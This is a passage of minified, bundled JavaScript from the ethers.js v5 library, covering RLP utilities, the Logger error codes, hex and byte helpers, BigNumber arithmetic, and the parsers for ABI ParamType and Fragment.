                    if ("number" == typeof e || "bigint" == typeof e) return e ? d(p(e)) : Uint8Array.from([]);
                    if (null == e) return Uint8Array.from([]);
                    throw new Error("toBytes: received unsupported type " + typeof e);
                }
                t.utils = {
                    bytesToHex: c,
                    concatBytes: h,
                    hexToBytes: d,
                    utf8ToBytes: f
                }, t.RLP = {
                    encode: r,
                    decode: s
                };
            },
            3260: (e, t, r)=>{
                "use strict";
                r.r(t), r.d(t, {
                    AbiCoder: ()=>rt,
                    ConstructorFragment: ()=>se,
                    ErrorFragment: ()=>ce,
                    EventFragment: ()=>re,
                    FormatTypes: ()=>Y,
                    Fragment: ()=>te,
                    FunctionFragment: ()=>ae,
                    Indexed: ()=>ct,
                    Interface: ()=>ht,
                    LogDescription: ()=>st,
                    ParamType: ()=>$,
                    TransactionDescription: ()=>at,
                    checkResultErrors: ()=>me,
                    defaultAbiCoder: ()=>nt
                });
                var n = r(4269), i = r.n(n);
                let o = !1, s = !1;
                const a = {
                    debug: 1,
                    default: 2,
                    info: 2,
                    warning: 3,
                    error: 4,
                    off: 5
                };
                let u = a.default, c = null;
                const l = function() {
                    try {
                        const e = [];
                        if ([
                            "NFD",
                            "NFC",
                            "NFKD",
                            "NFKC"
                        ].forEach((t)=>{
                            try {
                                if ("test" !== "test".normalize(t)) throw new Error("bad normalize");
                            } catch (r) {
                                e.push(t);
                            }
                        }), e.length) throw new Error("missing " + e.join(", "));
                        if (String.fromCharCode(233).normalize("NFD") !== String.fromCharCode(101, 769)) throw new Error("broken implementation");
                    } catch (e) {
                        return e.message;
                    }
                    return null;
                }();
                var d, h;
                !function(e) {
                    e.DEBUG = "DEBUG", e.INFO = "INFO", e.WARNING = "WARNING", e.ERROR = "ERROR", e.OFF = "OFF";
                }(d || (d = {})), function(e) {
                    e.UNKNOWN_ERROR = "UNKNOWN_ERROR", e.NOT_IMPLEMENTED = "NOT_IMPLEMENTED", e.UNSUPPORTED_OPERATION = "UNSUPPORTED_OPERATION", e.NETWORK_ERROR = "NETWORK_ERROR", e.SERVER_ERROR = "SERVER_ERROR", e.TIMEOUT = "TIMEOUT", e.BUFFER_OVERRUN = "BUFFER_OVERRUN", e.NUMERIC_FAULT = "NUMERIC_FAULT", e.MISSING_NEW = "MISSING_NEW", e.INVALID_ARGUMENT = "INVALID_ARGUMENT", e.MISSING_ARGUMENT = "MISSING_ARGUMENT", e.UNEXPECTED_ARGUMENT = "UNEXPECTED_ARGUMENT", e.CALL_EXCEPTION = "CALL_EXCEPTION", e.INSUFFICIENT_FUNDS = "INSUFFICIENT_FUNDS", e.NONCE_EXPIRED = "NONCE_EXPIRED", e.REPLACEMENT_UNDERPRICED = "REPLACEMENT_UNDERPRICED", e.UNPREDICTABLE_GAS_LIMIT = "UNPREDICTABLE_GAS_LIMIT", e.TRANSACTION_REPLACED = "TRANSACTION_REPLACED", e.ACTION_REJECTED = "ACTION_REJECTED";
                }(h || (h = {}));
                const f = "0123456789abcdef";
                class p {
                    constructor(e){
                        Object.defineProperty(this, "version", {
                            enumerable: !0,
                            value: e,
                            writable: !1
                        });
                    }
                    _log(e, t) {
                        const r = e.toLowerCase();
                        null == a[r] && this.throwArgumentError("invalid log level name", "logLevel", e), u > a[r] || console.log.apply(console, t);
                    }
                    debug(...e) {
                        this._log(p.levels.DEBUG, e);
                    }
                    info(...e) {
                        this._log(p.levels.INFO, e);
                    }
                    warn(...e) {
                        this._log(p.levels.WARNING, e);
                    }
                    makeError(e, t, r) {
                        if (s) return this.makeError("censored error", t, {});
                        t || (t = p.errors.UNKNOWN_ERROR), r || (r = {});
                        const n = [];
                        Object.keys(r).forEach((e)=>{
                            const t = r[e];
                            try {
                                if (t instanceof Uint8Array) {
                                    let r = "";
                                    for(let e = 0; e < t.length; e++)r += f[t[e] >> 4], r += f[15 & t[e]];
                                    n.push(e + "=Uint8Array(0x" + r + ")");
                                } else n.push(e + "=" + JSON.stringify(t));
                            } catch (t) {
                                n.push(e + "=" + JSON.stringify(r[e].toString()));
                            }
                        }), n.push(`code=${t}`), n.push(`version=${this.version}`);
                        const i = e;
                        let o = "";
                        switch(t){
                            case h.NUMERIC_FAULT:
                                {
                                    o = "NUMERIC_FAULT";
                                    const t = e;
                                    switch(t){
                                        case "overflow":
                                        case "underflow":
                                        case "division-by-zero":
                                            o += "-" + t;
                                            break;
                                        case "negative-power":
                                        case "negative-width":
                                            o += "-unsupported";
                                            break;
                                        case "unbound-bitwise-result":
                                            o += "-unbound-result";
                                    }
                                    break;
                                }
                            case h.CALL_EXCEPTION:
                            case h.INSUFFICIENT_FUNDS:
                            case h.MISSING_NEW:
                            case h.NONCE_EXPIRED:
                            case h.REPLACEMENT_UNDERPRICED:
                            case h.TRANSACTION_REPLACED:
                            case h.UNPREDICTABLE_GAS_LIMIT:
                                o = t;
                        }
                        o && (e += " [ See: https://links.ethers.org/v5-errors-" + o + " ]"), n.length && (e += " (" + n.join(", ") + ")");
                        const a = new Error(e);
                        return a.reason = i, a.code = t, Object.keys(r).forEach(function(e) {
                            a[e] = r[e];
                        }), a;
                    }
                    throwError(e, t, r) {
                        throw this.makeError(e, t, r);
                    }
                    throwArgumentError(e, t, r) {
                        return this.throwError(e, p.errors.INVALID_ARGUMENT, {
                            argument: t,
                            value: r
                        });
                    }
                    assert(e, t, r, n) {
                        e || this.throwError(t, r, n);
                    }
                    assertArgument(e, t, r, n) {
                        e || this.throwArgumentError(t, r, n);
                    }
                    checkNormalize(e) {
                        null == e && (e = "platform missing String.prototype.normalize"), l && this.throwError("platform missing String.prototype.normalize", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "String.prototype.normalize",
                            form: l
                        });
                    }
                    checkSafeUint53(e, t) {
                        "number" == typeof e && (null == t && (t = "value not safe"), (e < 0 || e >= 9007199254740991) && this.throwError(t, p.errors.NUMERIC_FAULT, {
                            operation: "checkSafeInteger",
                            fault: "out-of-safe-range",
                            value: e
                        }), e % 1 && this.throwError(t, p.errors.NUMERIC_FAULT, {
                            operation: "checkSafeInteger",
                            fault: "non-integer",
                            value: e
                        }));
                    }
                    checkArgumentCount(e, t, r) {
                        r = r ? ": " + r : "", e < t && this.throwError("missing argument" + r, p.errors.MISSING_ARGUMENT, {
                            count: e,
                            expectedCount: t
                        }), e > t && this.throwError("too many arguments" + r, p.errors.UNEXPECTED_ARGUMENT, {
                            count: e,
                            expectedCount: t
                        });
                    }
                    checkNew(e, t) {
                        e !== Object && null != e || this.throwError("missing new", p.errors.MISSING_NEW, {
                            name: t.name
                        });
                    }
                    checkAbstract(e, t) {
                        e === t ? this.throwError("cannot instantiate abstract class " + JSON.stringify(t.name) + " directly; use a sub-class", p.errors.UNSUPPORTED_OPERATION, {
                            name: e.name,
                            operation: "new"
                        }) : e !== Object && null != e || this.throwError("missing new", p.errors.MISSING_NEW, {
                            name: t.name
                        });
                    }
                    static globalLogger() {
                        return c || (c = new p("logger/5.7.0")), c;
                    }
                    static setCensorship(e, t) {
                        if (!e && t && this.globalLogger().throwError("cannot permanently disable censorship", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "setCensorship"
                        }), o) {
                            if (!e) return;
                            this.globalLogger().throwError("error censorship permanent", p.errors.UNSUPPORTED_OPERATION, {
                                operation: "setCensorship"
                            });
                        }
                        s = !!e, o = !!t;
                    }
                    static setLogLevel(e) {
                        const t = a[e.toLowerCase()];
                        null != t ? u = t : p.globalLogger().warn("invalid log level - " + e);
                    }
                    static from(e) {
                        return new p(e);
                    }
                }
                p.errors = h, p.levels = d;
                const m = new p("bytes/5.7.0");
                function g(e) {
                    return !!e.toHexString;
                }
                function y(e) {
                    return e.slice || (e.slice = function() {
                        const t = Array.prototype.slice.call(arguments);
                        return y(new Uint8Array(Array.prototype.slice.apply(e, t)));
                    }), e;
                }
                function v(e) {
                    return "number" == typeof e && e == e && e % 1 == 0;
                }
                function b(e) {
                    if (null == e) return !1;
                    if (e.constructor === Uint8Array) return !0;
                    if ("string" == typeof e) return !1;
                    if (!v(e.length) || e.length < 0) return !1;
                    for(let t = 0; t < e.length; t++){
                        const r = e[t];
                        if (!v(r) || r < 0 || r >= 256) return !1;
                    }
                    return !0;
                }
                function E(e, t) {
                    if (t || (t = {}), "number" == typeof e) {
                        m.checkSafeUint53(e, "invalid arrayify value");
                        const t = [];
                        for(; e;)t.unshift(255 & e), e = parseInt(String(e / 256));
                        return 0 === t.length && t.push(0), y(new Uint8Array(t));
                    }
                    if (t.allowMissingPrefix && "string" == typeof e && "0x" !== e.substring(0, 2) && (e = "0x" + e), g(e) && (e = e.toHexString()), _(e)) {
                        let r = e.substring(2);
                        r.length % 2 && ("left" === t.hexPad ? r = "0" + r : "right" === t.hexPad ? r += "0" : m.throwArgumentError("hex data is odd-length", "value", e));
                        const n = [];
                        for(let e = 0; e < r.length; e += 2)n.push(parseInt(r.substring(e, e + 2), 16));
                        return y(new Uint8Array(n));
                    }
                    return b(e) ? y(new Uint8Array(e)) : m.throwArgumentError("invalid arrayify value", "value", e);
                }
                function A(e) {
                    const t = e.map((e)=>E(e)), r = t.reduce((e, t)=>e + t.length, 0), n = new Uint8Array(r);
                    return t.reduce((e, t)=>(n.set(t, e), e + t.length), 0), y(n);
                }
                function _(e, t) {
                    return !("string" != typeof e || !e.match(/^0x[0-9A-Fa-f]*$/) || t && e.length !== 2 + 2 * t);
                }
                const w = "0123456789abcdef";
                function T(e, t) {
                    if (t || (t = {}), "number" == typeof e) {
                        m.checkSafeUint53(e, "invalid hexlify value");
                        let t = "";
                        for(; e;)t = w[15 & e] + t, e = Math.floor(e / 16);
                        return t.length ? (t.length % 2 && (t = "0" + t), "0x" + t) : "0x00";
                    }
                    if ("bigint" == typeof e) return (e = e.toString(16)).length % 2 ? "0x0" + e : "0x" + e;
                    if (t.allowMissingPrefix && "string" == typeof e && "0x" !== e.substring(0, 2) && (e = "0x" + e), g(e)) return e.toHexString();
                    if (_(e)) return e.length % 2 && ("left" === t.hexPad ? e = "0x0" + e.substring(2) : "right" === t.hexPad ? e += "0" : m.throwArgumentError("hex data is odd-length", "value", e)), e.toLowerCase();
                    if (b(e)) {
                        let t = "0x";
                        for(let r = 0; r < e.length; r++){
                            let n = e[r];
                            t += w[(240 & n) >> 4] + w[15 & n];
                        }
                        return t;
                    }
                    return m.throwArgumentError("invalid hexlify value", "value", e);
                }
                function R(e, t) {
                    for("string" != typeof e ? e = T(e) : _(e) || m.throwArgumentError("invalid hex string", "value", e), e.length > 2 * t + 2 && m.throwArgumentError("value out of range", "value", arguments[1]); e.length < 2 * t + 2;)e = "0x0" + e.substring(2);
                    return e;
                }
                var I = i().BN;
                const S = new p("bignumber/5.7.0"), P = {}, O = 9007199254740991;
                let x = !1;
                class M {
                    constructor(e, t){
                        e !== P && S.throwError("cannot call constructor directly; use BigNumber.from", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "new (BigNumber)"
                        }), this._hex = t, this._isBigNumber = !0, Object.freeze(this);
                    }
                    fromTwos(e) {
                        return N(C(this).fromTwos(e));
                    }
                    toTwos(e) {
                        return N(C(this).toTwos(e));
                    }
                    abs() {
                        return "-" === this._hex[0] ? M.from(this._hex.substring(1)) : this;
                    }
                    add(e) {
                        return N(C(this).add(C(e)));
                    }
                    sub(e) {
                        return N(C(this).sub(C(e)));
                    }
                    div(e) {
                        return M.from(e).isZero() && k("division-by-zero", "div"), N(C(this).div(C(e)));
                    }
                    mul(e) {
                        return N(C(this).mul(C(e)));
                    }
                    mod(e) {
                        const t = C(e);
                        return t.isNeg() && k("division-by-zero", "mod"), N(C(this).umod(t));
                    }
                    pow(e) {
                        const t = C(e);
                        return t.isNeg() && k("negative-power", "pow"), N(C(this).pow(t));
                    }
                    and(e) {
                        const t = C(e);
                        return (this.isNegative() || t.isNeg()) && k("unbound-bitwise-result", "and"), N(C(this).and(t));
                    }
                    or(e) {
                        const t = C(e);
                        return (this.isNegative() || t.isNeg()) && k("unbound-bitwise-result", "or"), N(C(this).or(t));
                    }
                    xor(e) {
                        const t = C(e);
                        return (this.isNegative() || t.isNeg()) && k("unbound-bitwise-result", "xor"), N(C(this).xor(t));
                    }
                    mask(e) {
                        return (this.isNegative() || e < 0) && k("negative-width", "mask"), N(C(this).maskn(e));
                    }
                    shl(e) {
                        return (this.isNegative() || e < 0) && k("negative-width", "shl"), N(C(this).shln(e));
                    }
                    shr(e) {
                        return (this.isNegative() || e < 0) && k("negative-width", "shr"), N(C(this).shrn(e));
                    }
                    eq(e) {
                        return C(this).eq(C(e));
                    }
                    lt(e) {
                        return C(this).lt(C(e));
                    }
                    lte(e) {
                        return C(this).lte(C(e));
                    }
                    gt(e) {
                        return C(this).gt(C(e));
                    }
                    gte(e) {
                        return C(this).gte(C(e));
                    }
                    isNegative() {
                        return "-" === this._hex[0];
                    }
                    isZero() {
                        return C(this).isZero();
                    }
                    toNumber() {
                        try {
                            return C(this).toNumber();
                        } catch (e) {
                            k("overflow", "toNumber", this.toString());
                        }
                        return null;
                    }
                    toBigInt() {
                        try {
                            return BigInt(this.toString());
                        } catch (e) {}
                        return S.throwError("this platform does not support BigInt", p.errors.UNSUPPORTED_OPERATION, {
                            value: this.toString()
                        });
                    }
                    toString() {
                        return arguments.length > 0 && (10 === arguments[0] ? x || (x = !0, S.warn("BigNumber.toString does not accept any parameters; base-10 is assumed")) : 16 === arguments[0] ? S.throwError("BigNumber.toString does not accept any parameters; use bigNumber.toHexString()", p.errors.UNEXPECTED_ARGUMENT, {}) : S.throwError("BigNumber.toString does not accept parameters", p.errors.UNEXPECTED_ARGUMENT, {})), C(this).toString(10);
                    }
                    toHexString() {
                        return this._hex;
                    }
                    toJSON(e) {
                        return {
                            type: "BigNumber",
                            hex: this.toHexString()
                        };
                    }
                    static from(e) {
                        if (e instanceof M) return e;
                        if ("string" == typeof e) return e.match(/^-?0x[0-9a-f]+$/i) ? new M(P, B(e)) : e.match(/^-?[0-9]+$/) ? new M(P, B(new I(e))) : S.throwArgumentError("invalid BigNumber string", "value", e);
                        if ("number" == typeof e) return e % 1 && k("underflow", "BigNumber.from", e), (e >= O || e <= -O) && k("overflow", "BigNumber.from", e), M.from(String(e));
                        const t = e;
                        if ("bigint" == typeof t) return M.from(t.toString());
                        if (b(t)) return M.from(T(t));
                        if (t) {
                            if (t.toHexString) {
                                const e = t.toHexString();
                                if ("string" == typeof e) return M.from(e);
                            } else {
                                let e = t._hex;
                                if (null == e && "BigNumber" === t.type && (e = t.hex), "string" == typeof e && (_(e) || "-" === e[0] && _(e.substring(1)))) return M.from(e);
                            }
                        }
                        return S.throwArgumentError("invalid BigNumber value", "value", e);
                    }
                    static isBigNumber(e) {
                        return !(!e || !e._isBigNumber);
                    }
                }
                function B(e) {
                    if ("string" != typeof e) return B(e.toString(16));
                    if ("-" === e[0]) return "-" === (e = e.substring(1))[0] && S.throwArgumentError("invalid hex", "value", e), "0x00" === (e = B(e)) ? e : "-" + e;
                    if ("0x" !== e.substring(0, 2) && (e = "0x" + e), "0x" === e) return "0x00";
                    for(e.length % 2 && (e = "0x0" + e.substring(2)); e.length > 4 && "0x00" === e.substring(0, 4);)e = "0x" + e.substring(4);
                    return e;
                }
                function N(e) {
                    return M.from(B(e));
                }
                function C(e) {
                    const t = M.from(e).toHexString();
                    return "-" === t[0] ? new I("-" + t.substring(3), 16) : new I(t.substring(2), 16);
                }
                function k(e, t, r) {
                    const n = {
                        fault: e,
                        operation: t
                    };
                    return null != r && (n.value = r), S.throwError(e, p.errors.NUMERIC_FAULT, n);
                }
                const L = new p("properties/5.7.0");
                function F(e, t, r) {
                    Object.defineProperty(e, t, {
                        enumerable: !0,
                        value: r,
                        writable: !1
                    });
                }
                function D(e, t) {
                    for(let r = 0; r < 32; r++){
                        if (e[t]) return e[t];
                        if (!e.prototype || "object" != typeof e.prototype) break;
                        e = Object.getPrototypeOf(e.prototype).constructor;
                    }
                    return null;
                }
                const j = {
                    bigint: !0,
                    boolean: !0,
                    function: !0,
                    number: !0,
                    string: !0
                };
                function U(e) {
                    if (null == e || j[typeof e]) return !0;
                    if (Array.isArray(e) || "object" == typeof e) {
                        if (!Object.isFrozen(e)) return !1;
                        const t = Object.keys(e);
                        for(let r = 0; r < t.length; r++){
                            let n = null;
                            try {
                                n = e[t[r]];
                            } catch (e) {
                                continue;
                            }
                            if (!U(n)) return !1;
                        }
                        return !0;
                    }
                    return L.throwArgumentError("Cannot deepCopy " + typeof e, "object", e);
                }
                function H(e) {
                    if (U(e)) return e;
                    if (Array.isArray(e)) return Object.freeze(e.map((e)=>G(e)));
                    if ("object" == typeof e) {
                        const t = {};
                        for(const r in e){
                            const n = e[r];
                            void 0 !== n && F(t, r, G(n));
                        }
                        return t;
                    }
                    return L.throwArgumentError("Cannot deepCopy " + typeof e, "object", e);
                }
                function G(e) {
                    return H(e);
                }
                class V {
                    constructor(e){
                        for(const t in e)this[t] = G(e[t]);
                    }
                }
                const W = "abi/5.7.0", q = new p(W), z = {};
                let Q = {
                    calldata: !0,
                    memory: !0,
                    storage: !0
                }, K = {
                    calldata: !0,
                    memory: !0
                };
                function J(e, t) {
                    if ("bytes" === e || "string" === e) {
                        if (Q[t]) return !0;
                    } else if ("address" === e) {
                        if ("payable" === t) return !0;
                    } else if ((e.indexOf("[") >= 0 || "tuple" === e) && K[t]) return !0;
                    return (Q[t] || "payable" === t) && q.throwArgumentError("invalid modifier", "name", t), !1;
                }
                function X(e, t) {
                    for(let r in t)F(e, r, t[r]);
                }
                const Y = Object.freeze({
                    sighash: "sighash",
                    minimal: "minimal",
                    full: "full",
                    json: "json"
                }), Z = new RegExp(/^(.*)\[([0-9]*)\]$/);
                class $ {
                    constructor(e, t){
                        e !== z && q.throwError("use fromString", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "new ParamType()"
                        }), X(this, t);
                        let r = this.type.match(Z);
                        X(this, r ? {
                            arrayLength: parseInt(r[2] || "-1"),
                            arrayChildren: $.fromObject({
                                type: r[1],
                                components: this.components
                            }),
                            baseType: "array"
                        } : {
                            arrayLength: null,
                            arrayChildren: null,
                            baseType: null != this.components ? "tuple" : this.type
                        }), this._isParamType = !0, Object.freeze(this);
                    }
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) {
                            let t = {
                                type: "tuple" === this.baseType ? "tuple" : this.type,
                                name: this.name || void 0
                            };
                            return "boolean" == typeof this.indexed && (t.indexed = this.indexed), this.components && (t.components = this.components.map((t)=>JSON.parse(t.format(e)))), JSON.stringify(t);
                        }
                        let t = "";
                        return "array" === this.baseType ? (t += this.arrayChildren.format(e), t += "[" + (this.arrayLength < 0 ? "" : String(this.arrayLength)) + "]") : "tuple" === this.baseType ? (e !== Y.sighash && (t += this.type), t += "(" + this.components.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ")") : t += this.type, e !== Y.sighash && (!0 === this.indexed && (t += " indexed"), e === Y.full && this.name && (t += " " + this.name)), t;
                    }
                    static from(e, t) {
                        return "string" == typeof e ? $.fromString(e, t) : $.fromObject(e);
                    }
                    static fromObject(e) {
                        return $.isParamType(e) ? e : new $(z, {
                            name: e.name || null,
                            type: le(e.type),
                            indexed: null == e.indexed ? null : !!e.indexed,
                            components: e.components ? e.components.map($.fromObject) : null
                        });
                    }
                    static fromString(e, t) {
                        var r;
                        return r = function(e, t) {
                            let r = e;
                            function n(t) {
                                q.throwArgumentError(`unexpected character at position ${t}`, "param", e);
                            }
                            function i(e) {
                                let r = {
                                    type: "",
                                    name: "",
                                    parent: e,
                                    state: {
                                        allowType: !0
                                    }
                                };
                                return t && (r.indexed = !1), r;
                            }
                            e = e.replace(/\s/g, " ");
                            let o = {
                                type: "",
                                name: "",
                                state: {
                                    allowType: !0
                                }
                            }, s = o;
                            for(let r = 0; r < e.length; r++){
                                let o = e[r];
                                switch(o){
                                    case "(":
                                        s.state.allowType && "" === s.type ? s.type = "tuple" : s.state.allowParams || n(r), s.state.allowType = !1, s.type = le(s.type), s.components = [
                                            i(s)
                                        ], s = s.components[0];
                                        break;
                                    case ")":
                                        delete s.state, "indexed" === s.name && (t || n(r), s.indexed = !0, s.name = ""), J(s.type, s.name) && (s.name = ""), s.type = le(s.type);
                                        let e1 = s;
                                        s = s.parent, s || n(r), delete e1.parent, s.state.allowParams = !1, s.state.allowName = !0, s.state.allowArray = !0;
                                        break;
                                    case ",":
                                        delete s.state, "indexed" === s.name && (t || n(r), s.indexed = !0, s.name = ""), J(s.type, s.name) && (s.name = ""), s.type = le(s.type);
                                        let a = i(s.parent);
                                        s.parent.components.push(a), delete s.parent, s = a;
                                        break;
                                    case " ":
                                        s.state.allowType && "" !== s.type && (s.type = le(s.type), delete s.state.allowType, s.state.allowName = !0, s.state.allowParams = !0), s.state.allowName && "" !== s.name && ("indexed" === s.name ? (t || n(r), s.indexed && n(r), s.indexed = !0, s.name = "") : J(s.type, s.name) ? s.name = "" : s.state.allowName = !1);
                                        break;
                                    case "[":
                                        s.state.allowArray || n(r), s.type += o, s.state.allowArray = !1, s.state.allowName = !1, s.state.readArray = !0;
                                        break;
                                    case "]":
                                        s.state.readArray || n(r), s.type += o, s.state.readArray = !1, s.state.allowArray = !0, s.state.allowName = !0;
                                        break;
                                    default:
                                        s.state.allowType ? (s.type += o, s.state.allowParams = !0, s.state.allowArray = !0) : s.state.allowName ? (s.name += o, delete s.state.allowArray) : s.state.readArray ? s.type += o : n(r);
                                }
                            }
                            return s.parent && q.throwArgumentError("unexpected eof", "param", e), delete o.state, "indexed" === s.name ? (t || n(r.length - 7), s.indexed && n(r.length - 7), s.indexed = !0, s.name = "") : J(s.type, s.name) && (s.name = ""), o.type = le(o.type), o;
                        }(e, !!t), $.fromObject({
                            name: r.name,
                            type: r.type,
                            indexed: r.indexed,
                            components: r.components
                        });
                    }
                    static isParamType(e) {
                        return !(null == e || !e._isParamType);
                    }
                }
                function ee(e, t) {
                    return (function(e) {
                        e = e.trim();
                        let t = [], r = "", n = 0;
                        for(let i = 0; i < e.length; i++){
                            let o = e[i];
                            "," === o && 0 === n ? (t.push(r), r = "") : (r += o, "(" === o ? n++ : ")" === o && (n--, -1 === n && q.throwArgumentError("unbalanced parenthesis", "value", e)));
                        }
                        return r && t.push(r), t;
                    })(e).map((e)=>$.fromString(e, t));
                }
                class te {
                    constructor(e, t){
                        e !== z && q.throwError("use a static from method", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "new Fragment()"
                        }), X(this, t), this._isFragment = !0, Object.freeze(this);
                    }
                    static from(e) {
                        return te.isFragment(e) ? e : "string" == typeof e ? te.fromString(e) : te.fromObject(e);
                    }
                    static fromObject(e) {
                        if (te.isFragment(e)) return e;
                        switch(e.type){
                            case "function":
                                return ae.fromObject(e);
                            case "event":
                                return re.fromObject(e);
                            case "constructor":
                                return se.fromObject(e);
                            case "error":
                                return ce.fromObject(e);
                            case "fallback":
                            case "receive":
                                return null;
                        }
                        return q.throwArgumentError("invalid fragment object", "value", e);
                    }
                    static fromString(e) {
                        return "event" === (e = (e = (e = e.replace(/\s/g, " ")).replace(/\(/g, " (").replace(/\)/g, ") ").replace(/\s+/g, " ")).trim()).split(" ")[0] ? re.fromString(e.substring(5).trim()) : "function" === e.split(" ")[0] ? ae.fromString(e.substring(8).trim()) : "constructor" === e.split("(")[0].trim() ? se.fromString(e.trim()) : "error" === e.split(" ")[0] ? ce.fromString(e.substring(5).trim()) : q.throwArgumentError("unsupported fragment", "value", e);
                    }
                    static isFragment(e) {
                        return !(!e || !e._isFragment);
                    }
                }
                class re extends te {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "event",
                            anonymous: this.anonymous,
                            name: this.name,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        let t = "";
                        return e !== Y.sighash && (t += "event "), t += this.name + "(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ", e !== Y.sighash && this.anonymous && (t += "anonymous "), t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? re.fromString(e) : re.fromObject(e);
                    }
                    static fromObject(e) {
                        if (re.isEventFragment(e)) return e;
                        "event" !== e.type && q.throwArgumentError("invalid event object", "value", e);
                        const t = {
                            name: he(e.name),
                            anonymous: e.anonymous,
                            inputs: e.inputs ? e.inputs.map($.fromObject) : [],
                            type: "event"
                        };
                        return new re(z, t);
                    }
                    static fromString(e) {
                        let t = e.match(fe);
                        t || q.throwArgumentError("invalid event string", "value", e);
                        let r = !1;
                        return t[3].split(" ").forEach((e)=>{
                            switch(e.trim()){
                                case "anonymous":
                                    r = !0;
                                    break;
                                case "":
                                    break;
                                default:
                                    q.warn("unknown modifier: " + e);
                            }
                        }), re.fromObject({
                            name: t[1].trim(),
                            anonymous: r,
                            inputs: ee(t[2], !0),
                            type: "event"
                        });
                    }
                    static isEventFragment(e) {
                        return e && e._isFragment && "event" === e.type;
                    }
                }
                function ne(e, t) {
                    t.gas = null;
                    let r = e.split("@");
                    return 1 !== r.length ? (r.length > 2 && q.throwArgumentError("invalid human-readable ABI signature", "value", e), r[1].match(/^[0-9]+$/) || q.throwArgumentError("invalid human-readable ABI signature gas", "value", e), t.gas = M.from(r[1]), r[0]) : e;
                }
                function ie(e, t) {
                    t.constant = !1, t.payable = !1, t.stateMutability = "nonpayable", e.split(" ").forEach((e)=>{
                        switch(e.trim()){
                            case "constant":
                                t.constant = !0;
                                break;
                            case "payable":
                                t.payable = !0, t.stateMutability = "payable";
                                break;
                            case "nonpayable":
                                t.payable = !1, t.stateMutability = "nonpayable";
                                break;
                            case "pure":
                                t.constant = !0, t.stateMutability = "pure";
                                break;
                            case "view":
                                t.constant = !0, t.stateMutability = "view";
                                break;
                            case "external":
                            case "public":
                            case "":
                                break;
                            default:
                                console.log("unknown modifier: " + e);
                        }
                    });
                }
                function oe(e) {
                    let t = {
                        constant: !1,
                        payable: !0,
                        stateMutability: "payable"
                    };
                    return null != e.stateMutability ? (t.stateMutability = e.stateMutability, t.constant = "view" === t.stateMutability || "pure" === t.stateMutability, null != e.constant && !!e.constant !== t.constant && q.throwArgumentError("cannot have constant function with mutability " + t.stateMutability, "value", e), t.payable = "payable" === t.stateMutability, null != e.payable && !!e.payable !== t.payable && q.throwArgumentError("cannot have payable function with mutability " + t.stateMutability, "value", e)) : null != e.payable ? (t.payable = !!e.payable, null != e.constant || t.payable || "constructor" === e.type || q.throwArgumentError("unable to determine stateMutability", "value", e), t.constant = !!e.constant, t.constant ? t.stateMutability = "view" : t.stateMutability = t.payable ? "payable" : "nonpayable", t.payable && t.constant && q.throwArgumentError("cannot have constant payable function", "value", e)) : null != e.constant ? (t.constant = !!e.constant, t.payable = !t.constant, t.stateMutability = t.constant ? "view" : "payable") : "constructor" !== e.type && q.throwArgumentError("unable to determine stateMutability", "value", e), t;
                }
                class se extends te {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "constructor",
                            stateMutability: "nonpayable" !== this.stateMutability ? this.stateMutability : void 0,
                            payable: this.payable,
                            gas: this.gas ? this.gas.toNumber() : void 0,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        e === Y.sighash && q.throwError("cannot format a constructor for sighash", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "format(sighash)"
                        });
                        let t = "constructor(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ";
                        return this.stateMutability && "nonpayable" !== this.stateMutability && (t += this.stateMutability + " "), t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? se.fromString(e) : se.fromObject(e);
                    }
                    static fromObject(e) {
                        if (se.isConstructorFragment(e)) return e;
                        "constructor" !== e.type && q.throwArgumentError("invalid constructor object", "value", e);
                        let t = oe(e);
                        t.constant && q.throwArgumentError("constructor cannot be constant", "value", e);
                        const r = {
                            name: null,
                            type: e.type,
                            inputs: e.inputs ? e.inputs.map($.fromObject) : [],
                            payable: t.payable,
                            stateMutability: t.stateMutability,
                            gas: e.gas ? M.from(e.gas) : null
                        };
                        return new se(z, r);
                    }
                    static fromString(e) {
                        let t = {
                            type: "constructor"
                        }, r = (e = ne(e, t)).match(fe);
                        return r && "constructor" === r[1].trim() || q.throwArgumentError("invalid constructor string", "value", e), t.inputs = ee(r[2].trim(), !1), ie(r[3].trim(), t), se.fromObject(t);
                    }
                    static isConstructorFragment(e) {
                        return e && e._isFragment && "constructor" === e.type;
                    }
                }
                class ae extends se {
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) return JSON.stringify({
                            type: "function",
                            name: this.name,
                            constant: this.constant,
                            stateMutability: "nonpayable" !== this.stateMutability ? this.stateMutability : void 0,
                            payable: this.payable,
                            gas: this.gas ? this.gas.toNumber() : void 0,
                            inputs: this.inputs.map((t)=>JSON.parse(t.format(e))),
                            outputs: this.outputs.map((t)=>JSON.parse(t.format(e)))
                        });
                        let t = "";
                        return e !== Y.sighash && (t += "function "), t += this.name + "(" + this.inputs.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ") ", e !== Y.sighash && (this.stateMutability ? "nonpayable" !== this.stateMutability && (t += this.stateMutability + " ") : this.constant && (t += "view "), this.outputs && this.outputs.length && (t += "returns (" + this.outputs.map((t)=>t.format(e)).join(", ") + ") "), null != this.gas && (t += "@" + this.gas.toString() + " ")), t.trim();
                    }
                    static from(e) {
                        return "string" == typeof e ? ae.fromString(e) : ae.fromObject(e);
                    }
                    static fromObject(e) {
                        if (ae.isFunctionFragment(e)) return e;
